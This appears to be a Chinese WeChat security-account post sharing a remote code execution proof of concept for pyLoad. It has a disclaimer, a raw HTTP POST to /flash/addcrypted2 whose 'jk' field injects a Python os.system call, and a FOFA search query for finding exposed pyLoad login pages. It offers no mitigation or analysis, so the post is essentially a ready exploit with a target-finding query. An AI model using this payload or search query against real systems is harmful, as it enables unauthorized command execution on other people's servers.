免责声明
该公众号主要是分享互联网上公开的一些漏洞poc和工具,利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如果本公众号分享导致的侵权行为请告知,我们会立即删除并道歉。
漏洞影响范围
漏洞复现
漏洞poc
POST /flash/addcrypted2 HTTP/1.1
Host:
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 119
jk=pyimport%20os;os.system("xxxx");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa
-
出现如下数据代表漏洞存在
搜索语法
fofa:title="Login-pyload"
原文始发于微信公众号(小白菜安全):pyLoad 远程代码执行漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论